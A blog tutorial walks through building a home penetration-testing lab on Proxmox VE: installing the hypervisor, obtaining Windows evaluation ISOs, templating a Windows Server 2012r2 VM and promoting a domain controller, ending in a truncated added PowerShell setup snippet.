<div>
<br /></div>
<div>
You will configure at least 2 virtual machines, most likely more:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/--U4VDrz8iJg/WTIpN7UaocI/AAAAAAAABbw/R2FShj6RKlw20eHrDAwckTUPZx7eyc_igCLcB/s1600/proxmox%2Blab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="249" data-original-width="232" height="320" src="https://3.bp.blogspot.com/--U4VDrz8iJg/WTIpN7UaocI/AAAAAAAABbw/R2FShj6RKlw20eHrDAwckTUPZx7eyc_igCLcB/s320/proxmox%2Blab.png" width="297" /></a></div>
<br /></div>
<div class="separator" style="clear: both;">
You will create a Windows 2012r2 domain, promote one server to be a DC, and add additional hosts to the domain:</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-MBXHKpY47Hc/WTIqK7XEUaI/AAAAAAAABb0/5myZYrok_Nc9DuaTP1t1WYZ9NjdbWp2ewCLcB/s1600/30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="173" data-original-width="455" height="241" src="https://1.bp.blogspot.com/-MBXHKpY47Hc/WTIqK7XEUaI/AAAAAAAABb0/5myZYrok_Nc9DuaTP1t1WYZ9NjdbWp2ewCLcB/s640/30.png" width="640" /></a></div>
<br />
You will create at least 2 users and 1 administrator account:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-65fcRPgZ9tg/WTIq3w1rCXI/AAAAAAAABb4/OhVRp56LNPsaa8xFWRkzIQUWw2dyjsLHgCLcB/s1600/31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="199" data-original-width="481" height="264" src="https://3.bp.blogspot.com/-65fcRPgZ9tg/WTIq3w1rCXI/AAAAAAAABb4/OhVRp56LNPsaa8xFWRkzIQUWw2dyjsLHgCLcB/s640/31.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
To get started, you really only need a Domain Controller and a Workstation. To be able to test out more stuff, you'll probably end up wanting at least two workstations (User 1's workstation and User 2's workstation), and at least one more non DC server. </div>
<br />
<h2>
Example server specs</h2>
I'm including my server specs just as a reference point. I've found it really helpful in the past when people have done the same:<br />
<br />
<u>2013 configuration</u><br />
<b>CPU:</b> AMD FX-Series 8-Core (Circa 2013)<br />
<b>SSD: </b>512 GB SSD</div>
<div>
<b>Memory: </b>16GB DDR3<br />
<br />
<div>
<u>2017 configuration</u><br />
<b>CPU:</b> AMD FX-Series 8-Core (Circa 2013)<br />
<b>SSD: </b><span style="color: red;">1TB SSD</span><b> </b><span style="color: red;">(Samsung 850 EVO 1TB 2.5-Inch SATA III Internal)</span></div>
<div>
<b>Memory: </b><span style="color: red;">32GB DDR3</span></div>
<div>
<br /></div>
If you are building on consumer hardware like I did, I suggest just going right to 1TB of SSD and 32GB of RAM. I know it isn't cheap, but with only 500GB SSD and 16GB RAM I ran up against those limits pretty quickly. <br />
<br />
In <a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building a virtual corporate domain</a>, I touch on a few other options as well, for instance: Rather than using consumer hardware and an expensive 1TB SSD, you can buy used enterprise grade stuff on eBay, which often comes with tons of storage and memory. This is what my friend <a href="https://twitter.com/mikehacksthings">@mikehacksthings</a> does, who is also the one who introduced me to ProxmoxVE.<br />
<br />
Of course, there are many ways to do this, so here are more great resources that talk about some of the different hardware options:<br />
<br />
<div>
<a href="https://www.darkoperator.com/blog/2017/1/28/home-lab-design">Home Lab Design</a> by Carlos Perez<br />
<a href="https://www.darkoperator.com/blog/2014/1/10/my-new-home-lab-setup">My new home lab setup</a> by Carlos Perez<br />
<a href="https://adsecurity.org/?p=2653">Building an Effective Active Directory Lab Environment for Testing</a> by Sean Metcalf<br />
<a href="https://room362.com/post/2015/intel-nuc-super-server/">Intel NUC Super Server</a> by Mubix</div>
<div>
<br /></div>
<h2>
Let's talk about network placement </h2>
You can get really fancy and run your lab in a restricted subnet, or you can just keep it simple and run it on the same flat network you use for everything else on your home network. You do not need to separate your lab from your home network. In other words, <b>don't let network architecture stop you from setting up your lab. </b>I've made that mistake before.<br />
<br />
If you have a firewall or a router at home you can absolutely place your hypervisor on its own network and control access between your lab and your home network. This is what I am doing now. I have my home network somewhere on 192.168 and I have my lab on 10.0.0.0/24<br />
<br />
Another note: I suggest that you use bridged mode for all virtual machines. You can do almost everything you want to do with NAT, but that means you won't be able to run tools against your lab unless they are being run from other virtual machines in the lab's private network. The flip side of bridged mode is that every deliberately weak box in the lab is reachable from anything else on that network, so keep that in mind if the lab shares a flat network with the rest of your house.<br />
<br />
<br />
<h2>
Installing the hypervisor (Proxmox VE)</h2>
If you have a favorite hypervisor and don't want to try Proxmox VE, you can just skip this section.<br />
<div>
<br /></div>
1) Download the ISO<br />
<ol>
<li>https://www.proxmox.com/en/downloads</li>
<li>I went with Proxmox VE 4.4</li>
</ol>
2) Transfer ISO to CD/DVD or USB<br />
3) Boot your physical server into the install ISO<br />
4) Select Install <b>Proxmox VE</b><br />
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-cg_C13Rr-C8/WS-HWj6L4fI/AAAAAAAABYc/bQHMgg1cicUsqQI2VSQiuFWX96c7FaiDACEw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="957" height="226" src="https://2.bp.blogspot.com/-cg_C13Rr-C8/WS-HWj6L4fI/AAAAAAAABYc/bQHMgg1cicUsqQI2VSQiuFWX96c7FaiDACEw/s400/1.png" width="400" /></a></div>
<div>
<i><br /></i>5) Select <b>I agree</b><br />
6) Pick <b>harddisk </b>and select <b>Next</b><br />
7) Select Country, Time zone, and Keyboard Layout and select <b>Next</b><br />
8) Select a password and enter your email address (I have not gotten any email from them). This is the root password for the hypervisor that will host every lab VM, so pick a strong one even though the lab itself is going to be full of weak credentials<br />
9) Configure management network interface and select Next<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-u1hbfAMIH5o/WS-HXDdwa9I/AAAAAAAABYc/0VYAosgE-6QYcQNnnJUzdBBEsQBzXMkMQCEw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="674" data-original-width="932" height="288" src="https://3.bp.blogspot.com/-u1hbfAMIH5o/WS-HXDdwa9I/AAAAAAAABYc/0VYAosgE-6QYcQNnnJUzdBBEsQBzXMkMQCEw/s400/2.png" width="400" /></a></div>
<div>
<br />
10) Select <b>Next</b>. This will begin the install<br />
11) Click <b>Reboot</b><br />
12) At the console, you should see something like this:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-ZEL65czQpGc/WS-HXIED4SI/AAAAAAAABYc/5cXgVGLTDUgtKfzp-4PizxIDgrWs6VBmgCEw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="172" data-original-width="636" height="107" src="https://4.bp.blogspot.com/-ZEL65czQpGc/WS-HXIED4SI/AAAAAAAABYc/5cXgVGLTDUgtKfzp-4PizxIDgrWs6VBmgCEw/s400/4.png" width="400" /></a></div>
<div>
<br />
13) Log into the console and update the OS:<br />
<ol>
<li>apt-get update && apt-get -y upgrade</li>
</ol>
Note: a fresh install ships with the enterprise repository enabled, and without a subscription key apt-get update reports a 401 Unauthorized error for it. Comment out /etc/apt/sources.list.d/pve-enterprise.list or add the pve-no-subscription repository to get clean updates. Proxmox also recommends dist-upgrade over a plain upgrade for PVE packages, since a plain upgrade can hold back packages that a new version depends on.<br />
14) You are ready to log in and start building virtual machines<br />
15) Navigate to the IP you gave your PVE (https://IP:8006). The web interface uses a self-signed certificate, so expect a browser warning<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-2WuyBE3-L6A/WS-HXYgWsII/AAAAAAAABYc/rVOSSQwl68gTvSsHjEJd015eYxasOinLwCEw/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="28" data-original-width="240" height="46" src="https://1.bp.blogspot.com/-2WuyBE3-L6A/WS-HXYgWsII/AAAAAAAABYc/rVOSSQwl68gTvSsHjEJd015eYxasOinLwCEw/s400/5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
16) Log in to web interface with username: root (and the password you specified at install)<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-eWk4Uwjzdlg/WS-HXd2-YYI/AAAAAAAABYc/gxERYbzIWfQ7p0T18-q2MNDoxRbsVZj2gCEw/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="202" data-original-width="402" height="200" src="https://3.bp.blogspot.com/-eWk4Uwjzdlg/WS-HXd2-YYI/AAAAAAAABYc/gxERYbzIWfQ7p0T18-q2MNDoxRbsVZj2gCEw/s400/6.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
17) SSH to the server - just to make sure you can<br />
<div>
Troubleshooting tip: I was initially unable to reach my newly installed proxmox. It turns out that the default bridge was set up for eth0, but I was cabled into eth1. My eth1 is a better NIC, so rather than change the cable, I modified /etc/network/interfaces and switched the bridge from eth0 to eth1:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-GXVbFv5tYuo/WS-HW_morYI/AAAAAAAABYA/bcCW2Q6k9hEN3-zGG0snDv8TfhnTC_AQgCLcB/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="371" data-original-width="415" height="357" src="https://2.bp.blogspot.com/-GXVbFv5tYuo/WS-HW_morYI/AAAAAAAABYA/bcCW2Q6k9hEN3-zGG0snDv8TfhnTC_AQgCLcB/s400/13.png" width="400" /></a></div>
<div>
<br /></div>
<h2>
Getting Windows server software</h2>
<div>
If you are going to build on premises, you will need to get your hands on the following software:</div>
<div>
<ul>
<li>Required - Windows Server (2012 or 2016)</li>
<li>Optional - Windows 7 (or 8 or 10) </li>
</ul>
</div>
<div>
In terms of getting the software, there are a few options: </div>
<div>
<ol>
<li>Download evaluation versions, which are good for 180 days</li>
<li>See if your workplace has a key/iso that can be used in a lab environment</li>
<li>I think if you are a student you can get the OS's for free</li>
</ol>
</div>
For this post, I'll walk through the process of obtaining an evaluation license. If you already have licensed copies of Windows you can skip the next section:<br />
<h3>
Obtaining an evaluation license for Windows server</h3>
<div>
For my last AWS walkthrough, I built the AD lab on Windows Server 2016. For this post, to change it up, I'm going to use Windows Server 2012r2. If you want to use Server 2016, almost all of the steps should be the same. </div>
<div>
<br /></div>
1) Go here: https://www.microsoft.com/en-us/evalcenter/<br />
2) Click the <b>Evaluations</b> square<br />
3) Sign in with your Microsoft account. An old Hotmail account and/or a current outlook.com account should work<br />
4) Click the <b>Evaluations</b> square again</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-y-FTVvdfht8/WS-HXQV96iI/AAAAAAAABYc/_7PUXUEu9Wc2BShmuIvb8M7DmNkmQnwCACEw/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="394" data-original-width="737" height="213" src="https://4.bp.blogspot.com/-y-FTVvdfht8/WS-HXQV96iI/AAAAAAAABYc/_7PUXUEu9Wc2BShmuIvb8M7DmNkmQnwCACEw/s400/9.png" width="400" /></a></div>
<div>
5) Select the product you would like to evaluate (<b>Windows Server 2012r2</b>)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-odHNOqYjX4c/WS-HWkAxg6I/AAAAAAAABYc/oSmhbryY4AEZe_GsQLsLltETcVs1tkGSgCEw/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="422" data-original-width="1129" height="148" src="https://1.bp.blogspot.com/-odHNOqYjX4c/WS-HWkAxg6I/AAAAAAAABYc/oSmhbryY4AEZe_GsQLsLltETcVs1tkGSgCEw/s400/10.png" width="400" /></a></div>
<div>
6) Select <b>Register to continue</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-jTHlJm97hBY/WS-HWg2IRvI/AAAAAAAABYc/qt-snxwVtpsQAGW29bGLVET6OrZwxQWowCEw/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="222" data-original-width="1112" height="63" src="https://1.bp.blogspot.com/-jTHlJm97hBY/WS-HWg2IRvI/AAAAAAAABYc/qt-snxwVtpsQAGW29bGLVET6OrZwxQWowCEw/s320/11.png" width="320" /></a></div>
<div>
7) Enter your info</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ymqRhce1t1Q/WS-HW6b6riI/AAAAAAAABYc/hSZBIxX2Jysdebz4ajUXmedglmprW0D9gCEw/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="545" data-original-width="752" height="288" src="https://1.bp.blogspot.com/-ymqRhce1t1Q/WS-HW6b6riI/AAAAAAAABYc/hSZBIxX2Jysdebz4ajUXmedglmprW0D9gCEw/s400/12.png" width="400" /></a></div>
<div>
8) Select <b>ISO</b></div>
<div>
9) Select <b>64 bit</b> and your language<br />
10) Select <b>Download</b></div>
<div>
<h3>
Downloading Windows 10 ISO</h3>
I'll walk through downloading the Windows 10 ISO, but as I mentioned earlier, you can skip Windows 10 and use Windows 7/8 instead. Note that the media creation tool gives you a regular retail image rather than a 180-day evaluation; it installs without a product key and simply runs unactivated, which is fine for a lab.<br />
<br />
1) Click this link: https://www.microsoft.com/en-us/software-download/windows10<br />
2) Click <b>Download tool now</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Zc1qMFKeo4U/WS-XPGB1dpI/AAAAAAAABZI/TLScm-z8Y30Jd-m24UbFKVcgDko0Htp1QCLcB/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="211" data-original-width="348" height="242" src="https://1.bp.blogspot.com/-Zc1qMFKeo4U/WS-XPGB1dpI/AAAAAAAABZI/TLScm-z8Y30Jd-m24UbFKVcgDko0Htp1QCLcB/s400/14.png" width="400" /></a></div>
<i><br /></i>
3) Run the tool<br />
4) Click <b>Accept</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-J7rUSSDu5Xo/WS-XPEJwfTI/AAAAAAAABZM/XCtxTDO5Z2gfLjnZfg0bdtBMtHiyddRiwCEw/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="463" data-original-width="640" height="288" src="https://2.bp.blogspot.com/-J7rUSSDu5Xo/WS-XPEJwfTI/AAAAAAAABZM/XCtxTDO5Z2gfLjnZfg0bdtBMtHiyddRiwCEw/s400/15.png" width="400" /></a></div>
<i><br /></i>
5) Click <b>Create installation media</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-cd-LhBq23yg/WS-XPNyU1-I/AAAAAAAABZQ/_xl3x3gPV8QKQ7ApWuTG9IKaF1bGdDO3gCEw/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="156" data-original-width="543" height="113" src="https://3.bp.blogspot.com/-cd-LhBq23yg/WS-XPNyU1-I/AAAAAAAABZQ/_xl3x3gPV8QKQ7ApWuTG9IKaF1bGdDO3gCEw/s400/16.png" width="400" /></a></div>
<i><br /></i>
6) Click <b>Next</b><br />
7) Stick with defaults and click <b>Next</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-emWIfzeGJR8/WS-XPZD7fHI/AAAAAAAABZU/b4_dfpK1wAopCALVLeADM8b90-VqcwBkwCEw/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="579" height="198" src="https://4.bp.blogspot.com/-emWIfzeGJR8/WS-XPZD7fHI/AAAAAAAABZU/b4_dfpK1wAopCALVLeADM8b90-VqcwBkwCEw/s400/17.png" width="400" /></a></div>
<br />
8) Click <b>ISO file</b><br />
9) Save the ISO (The default filename is windows.iso. I suggest renaming it to Win10Eval.iso or something)<br />
<br />
<h2>
Transferring ISOs to Proxmox</h2>
You can either configure a network share for Proxmox, or just drop ISOs in the right directory. The easiest way to do it is to SCP your ISOs to /var/lib/vz/template/iso/ on the Proxmox host; they then show up under the <b>local</b> storage when you create a VM.<br />
<br />
<h2>
VM #1: Creating our Server 2012r2 Template</h2>
<div>
For our first VM, let's go with Windows Server 2012r2. We will configure the VM, install the OS, convert our VM to a template, and then use that template to deploy two VMs for our lab. </div>
<h3>
Configuring a Proxmox VM (Windows Server 2012r2)</h3>
1) Log into the proxmox web interface<br />
2) At the top right, click <b>Create VM</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-4A23EWNZsFg/WS-XPR_OakI/AAAAAAAABZY/YUZVufOKIlM8z1vidmCHUXSPL8wwbjMXwCEw/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="112" data-original-width="546" height="65" src="https://3.bp.blogspot.com/-4A23EWNZsFg/WS-XPR_OakI/AAAAAAAABZY/YUZVufOKIlM8z1vidmCHUXSPL8wwbjMXwCEw/s320/18.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
3) General: Enter ID and Name and click next<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-FdgWGnhzwh4/WS-XPf2_olI/AAAAAAAABZc/9oLjxU78ss4CF3xay5iC7l9Z4FgISnXbACEw/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="174" data-original-width="317" src="https://2.bp.blogspot.com/-FdgWGnhzwh4/WS-XPf2_olI/AAAAAAAABZc/9oLjxU78ss4CF3xay5iC7l9Z4FgISnXbACEw/s1600/19.png" /></a></div>
<br />
4) OS: Select your OS (<b>Microsoft Windows 8.x/Server 2012r2</b>) and click <i>next </i><br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-dtJOOHw-DmQ/WS-hWQeFdwI/AAAAAAAABa8/ejPrtFFbxFUwFFBJOYFiV0_MSxqbM8NEACLcB/s1600/23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="149" data-original-width="255" src="https://4.bp.blogspot.com/-dtJOOHw-DmQ/WS-hWQeFdwI/AAAAAAAABa8/ejPrtFFbxFUwFFBJOYFiV0_MSxqbM8NEACLcB/s1600/23.png" /></a></div>
<i><br /></i>
5) Storage: Select <b>local</b>, and then your transferred ISOs should show up in that list. Select the correct windows server 2012 ISO and click <i>next</i><br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-scIBre-opos/WS-XPpyT_TI/AAAAAAAABZg/mtbKuFzHh0wxZeH4PMOJ1ysH-E8WFDzQACEw/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="240" data-original-width="515" height="149" src="https://2.bp.blogspot.com/-scIBre-opos/WS-XPpyT_TI/AAAAAAAABZg/mtbKuFzHh0wxZeH4PMOJ1ysH-E8WFDzQACEw/s320/20.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<i><br /></i>
6) Hard Disk: Click <b>next</b><br />
7) CPU: Click <b>next</b><br />
8) Memory: I like to select <b>Automatically allocate memory within this range</b>, and for Windows I tell it to stay between 1 and 4GB. You can certainly tweak these based on how much RAM you have.<br />
9) Click <b>next</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-CqT3W3yM4Jo/WS-XPprlpsI/AAAAAAAABZk/70vAyF4mOYEf7uqtBMEbkJdKNyk4s9fbwCEw/s1600/21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="327" data-original-width="422" height="247" src="https://4.bp.blogspot.com/-CqT3W3yM4Jo/WS-XPprlpsI/AAAAAAAABZk/70vAyF4mOYEf7uqtBMEbkJdKNyk4s9fbwCEw/s320/21.png" width="320" /></a></div>
<br />
10) Network: Keep defaults (Bridged mode), and click <b>next</b><br />
11) Click <b>finish</b><br />
12) In the right side column, find and right click the newly created instance. Click <b>start</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-FPrRQd9Enaw/WS-XPurjxwI/AAAAAAAABZs/KJgF-LNOF9YCMCJXfGrlVi1ZomPui-94gCEw/s1600/22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="74" data-original-width="293" src="https://3.bp.blogspot.com/-FPrRQd9Enaw/WS-XPurjxwI/AAAAAAAABZs/KJgF-LNOF9YCMCJXfGrlVi1ZomPui-94gCEw/s1600/22.png" /></a></div>
<br />
13) One column over, click <b>Console</b><br />
<br />
At this point, we are just installing Windows Server 2012r2 as we would normally. I'm going to keep it simple with some bulleted instructions and some commentary, but if you are looking for a similar post that has some nice looking pictures to go with these steps, check out the following series (Parts 1-3): <a href="https://www.psattack.com/articles/20160718/setting-up-an-active-directory-lab-part-1/">https://www.psattack.com/articles/20160718/setting-up-an-active-directory-lab-part-1/</a><br />
<div>
<br />
<b>Time/Sanity Saving Tip</b>: I used to spend hours updating all of my virtual machines before I would make a snapshot or template, but eventually I realized that it was mostly a waste of time. Sure, there are a few times where you do want to test your tools against a fully patched box. But, if this is your first pentest lab, I suggest learning from my hours of wasted time and skipping the patches until you need them. This applies to both the servers and the desktops. </div>
<h3>
Installing Windows Server 2012r2</h3>
<div>
1) If using local virtualization (not cloud based), give it 24-32GB of HD space and 1-2GB of RAM.<br />
2) Attach the ISO, boot up the virtual machine, and use this as a guide:</div>
3) Accept Default settings and click <b>Next</b><br />
4) Click <b>Install Now</b><br />
5) Select <b>Windows Server 2012 R2 Standard (server with a GUI)</b><br />
6)Accept the license terms and click <b>Next</b><br />
7) Select <b>Custom - New Installation</b><br />
8) Highlight <b>Drive0 unallocated space</b><br />
9) Click <i>Next</i><br />
10) Create an admin password. <i>Use something you don't mind other people seeing, as you might share stuff from this lab one day ;)</i><br />
11) Use the proxmox shortcut icon to enter Ctrl+Alt+Delete, and log in:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-E-8_3qF8S9M/WS-Yg01oWWI/AAAAAAAABaM/WlJYocjzICQwEhtLAJYhfFERwzNzq9xZACEw/s1600/24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="202" data-original-width="854" height="75" src="https://2.bp.blogspot.com/-E-8_3qF8S9M/WS-Yg01oWWI/AAAAAAAABaM/WlJYocjzICQwEhtLAJYhfFERwzNzq9xZACEw/s320/24.png" width="320" /></a></div>
<div>
<br /></div>
<div>
12) On the right hand popup: Do you want to find PCs, devices, etc. on the network: <i>Yes</i><br />
13) Do anything else you need to do on this VM before you convert it to a template. For instance, if you are not using an Eval license, you will want to run Sysprep on the VM (to generalize the image) before you turn it into a template. Either way, each clone will need its own hostname and IP address before it joins the domain, which the later sections cover.<br />
<h3>
Converting a VM to a template in Proxmox</h3>
</div>
<div>
1) Shut down and power off your VM</div>
<div>
2) On the left hand bar, right click on your Windows2012r2 VM and select <b>Convert to template</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-zOzJRPtcrQE/WS-hWeqo1kI/AAAAAAAABa0/6hH5HLMNLOknnEv6eaRZNxvfP_PfcPM9wCEw/s1600/25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="304" src="https://2.bp.blogspot.com/-zOzJRPtcrQE/WS-hWeqo1kI/AAAAAAAABa0/6hH5HLMNLOknnEv6eaRZNxvfP_PfcPM9wCEw/s1600/25.png" /></a></div>
<div>
<i><br /></i></div>
<div>
3) Click <i>Yes</i> at the confirmation page. Note: It will take a few minutes for the template to show up. You might see it more quickly if you refresh the proxmox page. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-kdkzkMnvet4/WS-hWoJokbI/AAAAAAAABbA/noAajHrl9IQxoclafUJc6NZFdRTFenvqACEw/s1600/26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="158" data-original-width="281" src="https://2.bp.blogspot.com/-kdkzkMnvet4/WS-hWoJokbI/AAAAAAAABbA/noAajHrl9IQxoclafUJc6NZFdRTFenvqACEw/s1600/26.png" /></a></div>
<div>
<br /></div>
<div>
4) That's it. You are ready to launch VMs from the template by right clicking on the template and selecting <b>clone</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-SU5M04xyo8c/WS-hWkLynoI/AAAAAAAABbE/3-NBk7UaCpwYHsPNcj4rxqdVsenZVVKAwCEw/s1600/27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="97" data-original-width="148" src="https://2.bp.blogspot.com/-SU5M04xyo8c/WS-hWkLynoI/AAAAAAAABbE/3-NBk7UaCpwYHsPNcj4rxqdVsenZVVKAwCEw/s1600/27.png" /></a></div>
<div>
<i><br /></i></div>
<h2>
VM #2 - Creating your 2012r2 Domain Controller</h2>
<h3>
Creating a new VM by cloning your template</h3>
<div>
<br /></div>
<div>
1) On the first tab of the Clone wizard, you will be asked if you would like to create a linked clone or a full clone. Linked clones are great, but that means you can never get rid of your template, so just be mindful of that. I don't like using linked clones when cloning one live VM into another, because it is hard to keep track. But with templates, I use them, because it is easier for me to make sure I never touch my templates. This is another reason why a 1TB drive is really nice.<br />
2) Right click on your template and select <b>Clone</b></div>
<div>
3) Name the first clone in the wizard (This will be your DC), and click <b>clone</b><br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-4hFhVmtY11I/WS-hWmdKjzI/AAAAAAAABbI/gRNEKM0UHUU75nmId7kbxdfGpwuY4SPTACEw/s1600/28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="250" data-original-width="602" height="165" src="https://2.bp.blogspot.com/-4hFhVmtY11I/WS-hWmdKjzI/AAAAAAAABbI/gRNEKM0UHUU75nmId7kbxdfGpwuY4SPTACEw/s400/28.png" width="400" /></a></div>
<div>
<br /></div>
<div>
4) Start DC01</div>
<div>
5) Assign a static IP. This is especially important for your DC. It doesn't matter if you chose NAT or bridged mode, but in either case, you will want a static IP in that range for your DC. Pick an address outside your router's DHCP pool (or reserve it there) so nothing else on the network can be handed the same IP. </div>
<div>
<ul>
<li>Right click on network icon on bottom right and click <b>Network and Sharing</b></li>
<li>Click <b>Ethernet</b> </li>
<li><b>Properties </b></li>
<li><b>IPv4</b> </li>
<li><b>Properties</b></li>
</ul>
6) This is not required, but this is a good time to change your hostname as well:<br />
<ul>
<li>Click the folder on the launch bar</li>
<li>Right click <b>This PC</b> on the left side</li>
<li><b>Properties, Change settings</b></li>
<li><b>Change</b></li>
<li>Change the computer name</li>
<li>Reboot</li>
</ul>
<h3>
Promoting your first server to a DC</h3>
1) Take a snapshot just in case you mess up :). Trust me, do it!<br />
<ul>
<li>To take a snapshot in Proxmox, Select your VM, switch from <b>Console</b> to <b>Snapshot</b> on the second left most bar, and click <b>Take Snapshot. </b></li>
</ul>
2) In the Server Manager, at the top right click <b><i>manage, add roles and features</i></b><br />
3) <b>Next, Next, Next</b><br />
4) Select <b>Active Directory Domain Services</b><br />
5) Select <b>Add Features</b><br />
6) Select <b>DNS Server</b><br />
7) Select <b>Add Features</b><br />
8) <b>Next, Next, Next, Next</b><br />
9) Select <b>Restart the destination server automatically if required</b><br />
10) <b>Yes, Install, Close</b><br />
11) In server manager, you will see a yellow caution triangle. Click it,<br />
12) Click <b>promote this server to a domain controller</b><br />
13) Add new forest<br />
14) Name your domain: <i> you can do lab.local for now, or you can make room for more domains in the future with something like lab.proxmox.local.</i><br />
15) Click <b>Next</b><br />
16) Create and record the DSRM password. This is the local Administrator password for Directory Services Restore Mode, the boot mode you use to repair AD when the directory itself won't start, so it is the one credential you will need when everything else is broken<br />
17) Click <b>Next</b> (ignore warning), <b>Next, Next, Next, Install</b><br />
18) You will see: <b>You are about to be signed out.</b><br />
19) Click <i>close</i> (or just hang tight)<br />
<br />
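<div>
The static IP and hostname steps from VM #2 (steps 5 and 6) and the promotion steps above (2 through 17) collapse into one elevated PowerShell script on the cloned server. This is an added example, not part of the original post; the 10.0.0.0/24 lab subnet, the adapter alias Ethernet, the hostname DC01, the forest name lab.local / LAB and the DSRM password are assumed values, so change them to match your lab.</div>

```powershell
# Added example (not from the original post): VM #2 steps 5 and 6 plus the
# "Promoting your first server to a DC" steps as one elevated PowerShell script
# on the freshly cloned server. Assumed lab values: the 10.0.0.0/24 subnet, the
# adapter alias 'Ethernet', hostname DC01, forest lab.local / LAB and the DSRM
# password; change them to match your lab.
$Iface    = 'Ethernet'
$DcIp     = '10.0.0.10'      # static address for the DC, outside the DHCP pool
$Gateway  = '10.0.0.1'       # lab router
$Hostname = 'DC01'
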